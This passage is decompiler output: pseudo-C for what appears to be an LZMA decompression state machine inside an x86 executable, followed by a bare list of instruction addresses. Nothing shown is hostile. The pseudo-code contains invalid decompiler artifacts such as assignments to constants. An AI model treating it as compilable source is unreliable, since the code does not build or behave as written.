                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												__eax =  *(__ebp - 0x2c);
                                  												goto L101;
                                  											case 0xd:
                                  												L37:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xd;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t122 = __ebp - 0x70;
                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t122;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L39:
                                  												__eax =  *(__ebp - 0x40);
                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  													goto L48;
                                  												}
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													goto L54;
                                  												}
                                  												L41:
                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  												 *(__ebp - 0x48) = __eax;
                                  												__eax = __eax + 1;
                                  												__eax = __eax << 8;
                                  												__eax = __eax + __ebx;
                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edx = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													 *(__ebp - 0x40) = 1;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													__ebx = __ebx + __ebx + 1;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edx;
                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L39;
                                  												} else {
                                  													goto L37;
                                  												}
                                  											case 0xe:
                                  												L46:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xe;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t156 = __ebp - 0x70;
                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t156;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												while(1) {
                                  													L48:
                                  													__eflags = __ebx - 0x100;
                                  													if(__ebx >= 0x100) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x58);
                                  													__edx = __ebx + __ebx;
                                  													__ecx =  *(__ebp - 0x10);
                                  													__esi = __edx + __eax;
                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                  													__ax =  *__esi;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__edi = __ax & 0x0000ffff;
                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                  													if( *(__ebp - 0xc) >= __ecx) {
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  														__cx = __ax;
                                  														_t170 = __edx + 1; // 0x1
                                  														__ebx = _t170;
                                  														__cx = __ax >> 5;
                                  														__eflags = __eax;
                                  														 *__esi = __ax;
                                  													} else {
                                  														 *(__ebp - 0x10) = __ecx;
                                  														0x800 = 0x800 - __edi;
                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  														__ebx = __ebx + __ebx;
                                  														 *__esi = __cx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														continue;
                                  													} else {
                                  														goto L46;
                                  													}
                                  												}
                                  												L54:
                                  												_t173 = __ebp - 0x34;
                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  												__eflags =  *_t173;
                                  												goto L55;
                                  											case 0xf:
                                  												L58:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xf;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t203 = __ebp - 0x70;
                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t203;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L60:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													L55:
                                  													__al =  *(__ebp - 0x44);
                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  													goto L56;
                                  												}
                                  												L61:
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t217 = __edx + 1; // 0x1
                                  													__ebx = _t217;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L60;
                                  												} else {
                                  													goto L58;
                                  												}
                                  											case 0x10:
                                  												L109:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x10;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t365 = __ebp - 0x70;
                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t365;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												goto L111;
                                  											case 0x11:
                                  												goto L69;
                                  											case 0x12:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 0x58);
                                  													 *(__ebp - 0x84) = 0x13;
                                  													__esi =  *(__ebp - 0x58) + 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t613 - 0x54) = _t606;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												__eflags = __eax;
                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                  												goto L130;
                                  											case 0x13:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													_t469 = __ebp - 0x58;
                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  													__eflags =  *_t469;
                                  													 *(__ebp - 0x30) = 0x10;
                                  													 *(__ebp - 0x40) = 8;
                                  													L144:
                                  													 *(__ebp - 0x7c) = 0x14;
                                  													goto L145;
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												 *(__ebp - 0x30) = 8;
                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  												L130:
                                  												 *(__ebp - 0x58) = __eax;
                                  												 *(__ebp - 0x40) = 3;
                                  												goto L144;
                                  											case 0x14:
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  												__eax =  *(__ebp - 0x80);
                                  												 *(_t613 - 0x88) = _t533;
                                  												goto L1;
                                  											case 0x15:
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  												goto L120;
                                  											case 0x16:
                                  												__eax =  *(__ebp - 0x30);
                                  												__eflags = __eax - 4;
                                  												if(__eax >= 4) {
                                  													_push(3);
                                  													_pop(__eax);
                                  												}
                                  												__ecx =  *(__ebp - 4);
                                  												 *(__ebp - 0x40) = 6;
                                  												__eax = __eax << 7;
                                  												 *(__ebp - 0x7c) = 0x19;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L145;
                                  											case 0x17:
                                  												L145:
                                  												__eax =  *(__ebp - 0x40);
                                  												 *(__ebp - 0x50) = 1;
                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  												goto L149;
                                  											case 0x18:
                                  												L146:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x18;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t484 = __ebp - 0x70;
                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t484;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L148:
                                  												_t487 = __ebp - 0x48;
                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                  												__eflags =  *_t487;
                                  												L149:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__ecx =  *(__ebp - 0x40);
                                  													__ebx =  *(__ebp - 0x50);
                                  													0 = 1;
                                  													__eax = 1 << __cl;
                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  													__eax =  *(__ebp - 0x7c);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													while(1) {
                                  														 *(_t613 - 0x88) = _t533;
                                  														goto L1;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x50);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  												__eax =  *(__ebp - 0x58);
                                  												__esi = __edx + __eax;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__ax =  *__esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													__cx = __ax >> 5;
                                  													__eax = __eax - __ecx;
                                  													__edx = __edx + 1;
                                  													__eflags = __edx;
                                  													 *__esi = __ax;
                                  													 *(__ebp - 0x50) = __edx;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L148;
                                  												} else {
                                  													goto L146;
                                  												}
                                  											case 0x19:
                                  												__eflags = __ebx - 4;
                                  												if(__ebx < 4) {
                                  													 *(__ebp - 0x2c) = __ebx;
                                  													L119:
                                  													_t393 = __ebp - 0x2c;
                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                  													__eflags =  *_t393;
                                  													L120:
                                  													__eax =  *(__ebp - 0x2c);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  														goto L170;
                                  													}
                                  													__eflags = __eax -  *(__ebp - 0x60);
                                  													if(__eax >  *(__ebp - 0x60)) {
                                  														goto L171;
                                  													}
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  													__eax =  *(__ebp - 0x30);
                                  													_t400 = __ebp - 0x60;
                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  													__eflags =  *_t400;
                                  													goto L123;
                                  												}
                                  												__ecx = __ebx;
                                  												__eax = __ebx;
                                  												__ecx = __ebx >> 1;
                                  												__eax = __ebx & 0x00000001;
                                  												__ecx = (__ebx >> 1) - 1;
                                  												__al = __al | 0x00000002;
                                  												__eax = (__ebx & 0x00000001) << __cl;
                                  												__eflags = __ebx - 0xe;
                                  												 *(__ebp - 0x2c) = __eax;
                                  												if(__ebx >= 0xe) {
                                  													__ebx = 0;
                                  													 *(__ebp - 0x48) = __ecx;
                                  													L102:
                                  													__eflags =  *(__ebp - 0x48);
                                  													if( *(__ebp - 0x48) <= 0) {
                                  														__eax = __eax + __ebx;
                                  														 *(__ebp - 0x40) = 4;
                                  														 *(__ebp - 0x2c) = __eax;
                                  														__eax =  *(__ebp - 4);
                                  														__eax =  *(__ebp - 4) + 0x644;
                                  														__eflags = __eax;
                                  														L108:
                                  														__ebx = 0;
                                  														 *(__ebp - 0x58) = __eax;
                                  														 *(__ebp - 0x50) = 1;
                                  														 *(__ebp - 0x44) = 0;
                                  														 *(__ebp - 0x48) = 0;
                                  														L112:
                                  														__eax =  *(__ebp - 0x40);
                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  															_t391 = __ebp - 0x2c;
                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  															__eflags =  *_t391;
                                  															goto L119;
                                  														}
                                  														__eax =  *(__ebp - 0x50);
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  														__eax =  *(__ebp - 0x58);
                                  														__esi = __edi + __eax;
                                  														 *(__ebp - 0x54) = __esi;
                                  														__ax =  *__esi;
                                  														__ecx = __ax & 0x0000ffff;
                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                  														if( *(__ebp - 0xc) >= __edx) {
                                  															__ecx = 0;
                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  															__ecx = 1;
                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  															__ebx = 1;
                                  															__ecx =  *(__ebp - 0x48);
                                  															__ebx = 1 << __cl;
                                  															__ecx = 1 << __cl;
                                  															__ebx =  *(__ebp - 0x44);
                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                  															__cx = __ax;
                                  															__cx = __ax >> 5;
                                  															__eax = __eax - __ecx;
                                  															__edi = __edi + 1;
                                  															__eflags = __edi;
                                  															 *(__ebp - 0x44) = __ebx;
                                  															 *__esi = __ax;
                                  															 *(__ebp - 0x50) = __edi;
                                  														} else {
                                  															 *(__ebp - 0x10) = __edx;
                                  															0x800 = 0x800 - __ecx;
                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  															 *__esi = __dx;
                                  														}
                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                  															L111:
                                  															_t368 = __ebp - 0x48;
                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                  															__eflags =  *_t368;
                                  															goto L112;
                                  														} else {
                                  															goto L109;
                                  														}
                                  													}
                                  													__ecx =  *(__ebp - 0xc);
                                  													__ebx = __ebx + __ebx;
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  														__ecx =  *(__ebp - 0x10);
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  														__ebx = __ebx | 0x00000001;
                                  														__eflags = __ebx;
                                  														 *(__ebp - 0x44) = __ebx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L101:
                                  														_t338 = __ebp - 0x48;
                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                  														__eflags =  *_t338;
                                  														goto L102;
                                  													} else {
                                  														goto L99;
                                  													}
                                  												}
                                  												__edx =  *(__ebp - 4);
                                  												__eax = __eax - __ebx;
                                  												 *(__ebp - 0x40) = __ecx;
                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  												goto L108;
                                  											case 0x1a:
                                  												L56:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1a;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x68);
                                  												__al =  *(__ebp - 0x5c);
                                  												__edx =  *(__ebp - 8);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *( *(__ebp - 0x68)) = __al;
                                  												__ecx =  *(__ebp - 0x14);
                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                  												__eax = __ecx + 1;
                                  												__edx = 0;
                                  												_t192 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t192;
                                  												goto L80;
                                  											case 0x1b:
                                  												L76:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1b;
                                  													goto L170;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t275 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t275;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												_t284 = __ebp - 0x64;
                                  												 *_t284 =  *(__ebp - 0x64) - 1;
                                  												__eflags =  *_t284;
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												L80:
                                  												 *(__ebp - 0x14) = __edx;
                                  												goto L81;
                                  											case 0x1c:
                                  												while(1) {
                                  													L123:
                                  													__eflags =  *(__ebp - 0x64);
                                  													if( *(__ebp - 0x64) == 0) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__edx =  *(__ebp - 8);
                                  													__cl =  *(__eax + __edx);
                                  													__eax =  *(__ebp - 0x14);
                                  													 *(__ebp - 0x5c) = __cl;
                                  													 *(__eax + __edx) = __cl;
                                  													__eax = __eax + 1;
                                  													__edx = 0;
                                  													_t414 = __eax %  *(__ebp - 0x74);
                                  													__eax = __eax /  *(__ebp - 0x74);
                                  													__edx = _t414;
                                  													__eax =  *(__ebp - 0x68);
                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  													__eflags =  *(__ebp - 0x30);
                                  													 *( *(__ebp - 0x68)) = __cl;
                                  													 *(__ebp - 0x14) = _t414;
                                  													if( *(__ebp - 0x30) > 0) {
                                  														continue;
                                  													} else {
                                  														L81:
                                  														 *(__ebp - 0x88) = 2;
                                  														goto L1;
                                  													}
                                  												}
                                  												 *(__ebp - 0x88) = 0x1c;
                                  												goto L170;
                                  										}
                                  									}
                                  									L171:
                                  									_t535 = _t534 | 0xffffffff;
                                  									goto L172;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					goto L1;
                                  				}
                                  			}













                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
